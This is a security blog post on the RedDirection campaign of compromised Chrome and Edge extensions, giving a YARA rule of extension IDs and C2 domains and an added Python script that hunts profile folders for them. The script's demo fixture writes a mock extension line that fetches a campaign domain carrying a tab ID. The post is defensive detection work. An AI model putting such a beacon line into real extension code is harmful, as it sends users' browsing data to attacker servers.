RedDirection: A YARA Rule to Detect its Artifacts
An investigation into a seemingly benign Color Picker browser extension revealed a sophisticated cross-platform campaign. On July 8, 2025, Koi Security reported on RedDirection, a campaign of 18 compromised Edge and Chrome extensions that affected over 2 million web users. The campaign is a meticulous operation: each extension delivers a fully functional product together with a backdoor that reports to a C2 server. According to Koi Security, all of the extensions were verified by Google and Microsoft Edge and turned malicious only after years of legitimate activity, which makes this operation all the more alarming.
How This Happens
Threat actors are known to abuse trust features, so this kind of attack should come as no surprise to anyone in the security community. Koi Security said it best: Google's and Microsoft's review process is built "for scale, not scrutiny". As consumers, we tend to assume that products endorsed by big platforms are inherently safe. This incident serves as a reminder that we should always be vigilant.
Detecting RedDirection With Stairwell’s YARA Rule
While most of the compromised extensions have now been removed from the Chrome Web Store and the Microsoft Edge Add-ons store, some of the malicious domains remain active, such as undiscord[.]com and unyoutube[.]net. It is therefore paramount to perform a comprehensive search to ensure all RedDirection artifacts are detected and remediated.
To aid this effort, we have crafted a YARA rule that enables effective and efficient scanning for these Indicators of Compromise:
rule Chrome_Edge_Extensions_RedDirection
{
    meta:
        author = "Evelyne Diaz Araque ([email protected])"
        date = "2025-07-10"
        description = "Chrome + Edge extensions and domains compromised in the Red Direction campaign."

    strings:
        // chrome extension path structure
        $path1 = "\\AppData\\Local\\Google\\Chrome\\User Data\\" ascii nocase
        $path2 = "\\Extensions\\" ascii nocase

        // chrome extension IDs
        $ext1 = "kgmeffmlnkfnjpgmdndccklfigfhajen" ascii nocase // Emoji keyboard online — copy&past your emoji
        $ext2 = "dpdibkjjgbaadnnjhkmmnenkmbnhpobj" ascii nocase // Free Weather Forecast
        $ext3 = "gaiceihehajjahakcglkhmdbbdclbnlf" ascii nocase // Video Speed Controller — Video manager
        $ext4 = "mlgbkfnjdmaoldgagamcnommbbnhfnhf" ascii nocase // Unlock Discord — VPN Proxy to Unblock Discord Anywhere
        $ext5 = "eckokfcjbjbgjifpcbdmengnabecdakp" ascii nocase // Dark Theme — Fake version of Dark Reader for Chrome
        $ext6 = "mgbhdehiapbjamfgekfpebmhmnmcmemg" ascii nocase // Volume Max — Ultimate Sound Booster
        $ext7 = "cbajickflblmpjodnjoldpiicfmecmif" ascii nocase // Unblock TikTok — Seamless Access with One-Click Proxy
        $ext8 = "pdbfcnhlobhoahcamoefbfodpmklgmjm" ascii nocase // Unlock YouTube VPN
        $ext9 = "eokjikchkppnkdipbiggnmlkahcdkikp" ascii nocase // Color Picker, Eyedropper — Geco colorpick
        $ext10 = "ihbiedpeaicgipncdnnkikeehnjiddck" ascii nocase // Weather

        // edge extension path structure
        $path3 = "\\AppData\\Local\\Microsoft\\Edge\\User Data\\" ascii nocase
        $path4 = "\\Extensions\\" ascii nocase

        // edge extension IDs
        $id1 = "jjdajogomggcjifnjgkpghcijgkbcjdi" ascii nocase // Unlock TikTok
        $id2 = "mmcnmppeeghenglmidpmjkaiamcacmgm" ascii nocase // Volume Booster — Increase your sound
        $id3 = "ojdkklpgpacpicaobnhankbalkkgaafp" ascii nocase // Web Sound Equalizer
        $id4 = "lodeighbngipjjedfelnboplhgediclp" ascii nocase // Header Value
        $id5 = "hkjagicdaogfgdifaklcgajmgefjllmd" ascii nocase // Flash Player — games emulator
        $id6 = "gflkbgebojohihfnnplhbdakoipdbpdm" ascii nocase // Youtube Unblocked
        $id7 = "kpilmncnoafddjpnbhepaiilgkdcieaf" ascii nocase // SearchGPT — ChatGPT for Search Engine
        $id8 = "caibdnkmpnjhjdfnomfhijhmebigcelo" ascii nocase // Unlock Discord

        // C2 / redirect domains used by the campaign
        $d1 = "admitab.com" ascii nocase
        $d2 = "edmitab.com" ascii nocase
        $d3 = "click.videocontrolls.com" ascii nocase
        $d4 = "c.undiscord.com" ascii nocase
        $d5 = "click.darktheme.net" ascii nocase
        $d6 = "c.jermikro.com" ascii nocase
        $d7 = "c.untwitter.com" ascii nocase
        $d8 = "c.unyoutube.net" ascii nocase
        $d9 = "admitclick.net" ascii nocase
        $d10 = "addmitad.com" ascii nocase
        $d11 = "admiitad.com" ascii nocase
        $d12 = "abmitab.com" ascii nocase
        $d13 = "admitlink.net" ascii nocase

    condition:
        // a Chrome profile path plus any compromised Chrome extension ID
        ($path1 and $path2 and 1 of ($ext*)) or
        // an Edge profile path plus any compromised Edge extension ID
        ($path3 and $path4 and 1 of ($id*)) or
        // any campaign domain on its own
        (1 of ($d*))
}
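The rule above is written for scanning artifacts that have already been collected (disk images, memory dumps, log exports). For a quick host-side hunt without a YARA engine, the same three checks can be expressed directly against the browser profile directories. The script below is an added example and is not Stairwell's tooling or part of the original post. It assumes the Windows "User Data" layout that the rule's $path strings describe (one "Extensions" folder per profile, one folder per extension ID), reuses the extension IDs and domains from the rule, and ships a constructed temporary fixture so it can be run offline; the extension ID "aaaabbbbccccddddeeeeffffgggghhhh" in that fixture is made up and stands in for a benign extension.

```python
"""Hunt for RedDirection artifacts in Chrome/Edge profile directories (added example)."""
import os
import re
import tempfile
from pathlib import Path

# Extension IDs and domains taken from the YARA rule on this page.
CHROME_IDS = {
    "kgmeffmlnkfnjpgmdndccklfigfhajen", "dpdibkjjgbaadnnjhkmmnenkmbnhpobj",
    "gaiceihehajjahakcglkhmdbbdclbnlf", "mlgbkfnjdmaoldgagamcnommbbnhfnhf",
    "eckokfcjbjbgjifpcbdmengnabecdakp", "mgbhdehiapbjamfgekfpebmhmnmcmemg",
    "cbajickflblmpjodnjoldpiicfmecmif", "pdbfcnhlobhoahcamoefbfodpmklgmjm",
    "eokjikchkppnkdipbiggnmlkahcdkikp", "ihbiedpeaicgipncdnnkikeehnjiddck",
}
EDGE_IDS = {
    "jjdajogomggcjifnjgkpghcijgkbcjdi", "mmcnmppeeghenglmidpmjkaiamcacmgm",
    "ojdkklpgpacpicaobnhankbalkkgaafp", "lodeighbngipjjedfelnboplhgediclp",
    "hkjagicdaogfgdifaklcgajmgefjllmd", "gflkbgebojohihfnnplhbdakoipdbpdm",
    "kpilmncnoafddjpnbhepaiilgkdcieaf", "caibdnkmpnjhjdfnomfhijhmebigcelo",
}
DOMAINS = [
    "admitab.com", "edmitab.com", "click.videocontrolls.com", "c.undiscord.com",
    "click.darktheme.net", "c.jermikro.com", "c.untwitter.com", "c.unyoutube.net",
    "admitclick.net", "addmitad.com", "admiitad.com", "abmitab.com", "admitlink.net",
]
# Same semantics as the rule's "ascii nocase" strings: raw byte substring, case-insensitive.
DOMAIN_RE = re.compile("|".join(re.escape(d) for d in DOMAINS).encode(), re.IGNORECASE)

SCAN_SUFFIXES = {".js", ".json", ".html", ".txt"}   # extension sources worth reading
MAX_FILE_BYTES = 8 * 1024 * 1024                     # skip large bundled assets


def default_user_data_dirs():
    """Windows locations matching the rule's $path1/$path3 strings (assumption: LOCALAPPDATA set)."""
    local = Path(os.environ.get("LOCALAPPDATA", ""))
    return local / "Google" / "Chrome" / "User Data", local / "Microsoft" / "Edge" / "User Data"


def installed_extension_ids(user_data_dir):
    """Yield (profile_name, extension_id, path) for every <profile>/Extensions/<id> directory."""
    root = Path(user_data_dir)
    if not root.is_dir():
        return
    for profile in root.iterdir():
        ext_root = profile / "Extensions"
        if not ext_root.is_dir():
            continue
        for ext_dir in ext_root.iterdir():
            if ext_dir.is_dir():
                yield profile.name, ext_dir.name.lower(), ext_dir


def domains_in_file(path):
    """Return the set of campaign domains (lowercased) found in one file; empty if none."""
    p = Path(path)
    if p.suffix.lower() not in SCAN_SUFFIXES or p.stat().st_size > MAX_FILE_BYTES:
        return set()
    return {m.group(0).decode("ascii", "replace").lower() for m in DOMAIN_RE.finditer(p.read_bytes())}


def hunt(chrome_user_data, edge_user_data):
    """Mirror the rule's three condition branches: Chrome IDs, Edge IDs, and domains in any extension file."""
    findings = {"chrome_ids": [], "edge_ids": [], "domain_hits": {}}
    for browser, root, bad_ids in (("chrome", chrome_user_data, CHROME_IDS),
                                   ("edge", edge_user_data, EDGE_IDS)):
        for profile, ext_id, ext_dir in installed_extension_ids(root):
            if ext_id in bad_ids:
                findings[f"{browser}_ids"].append((profile, ext_id))
            # Every installed extension gets its files checked, so a renamed/re-IDed copy still surfaces.
            for f in ext_dir.rglob("*"):
                if f.is_file():
                    hits = domains_in_file(f)
                    if hits:
                        findings["domain_hits"][str(f)] = sorted(hits)
    return findings


def build_demo_fixture():
    """Constructed sample layout (not real artifacts) so the hunt can be exercised offline."""
    base = Path(tempfile.mkdtemp(prefix="reddirection_demo_"))
    chrome = base / "Chrome" / "User Data"
    edge = base / "Edge" / "User Data"
    # Compromised Color Picker ID under the Default profile, with a script naming a campaign domain.
    bad = chrome / "Default" / "Extensions" / "eokjikchkppnkdipbiggnmlkahcdkikp" / "1.0_0"
    bad.mkdir(parents=True)
    (bad / "background.js").write_text('fetch("https://C.UNDISCORD.COM/x?id=" + tabId);\n')
    # Benign extension with a made-up ID and no campaign domains.
    ok = chrome / "Default" / "Extensions" / "aaaabbbbccccddddeeeeffffgggghhhh" / "2.0_0"
    ok.mkdir(parents=True)
    (ok / "content.js").write_text("console.log('hello');\n")
    # Edge profile containing a compromised ID whose files have not been written yet.
    (edge / "Profile 1" / "Extensions" / "caibdnkmpnjhjdfnomfhijhmebigcelo").mkdir(parents=True)
    return chrome, edge


if __name__ == "__main__":
    demo_chrome, demo_edge = build_demo_fixture()
    print(hunt(demo_chrome, demo_edge))   # swap in default_user_data_dirs() for a live host
```

Two caveats carry over from the rule itself. The domain branch fires on any file containing one of the strings, so browser history, cache and DNS logs will also match; treat a domain hit as a lead to the extension or process that made the request rather than as proof of an installed extension. And matching on extension ID only catches the known 18, so the domain sweep over every installed extension is what gives coverage if a further ID is added to the campaign.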
Read more about RedDirection in another Stairwell blog post.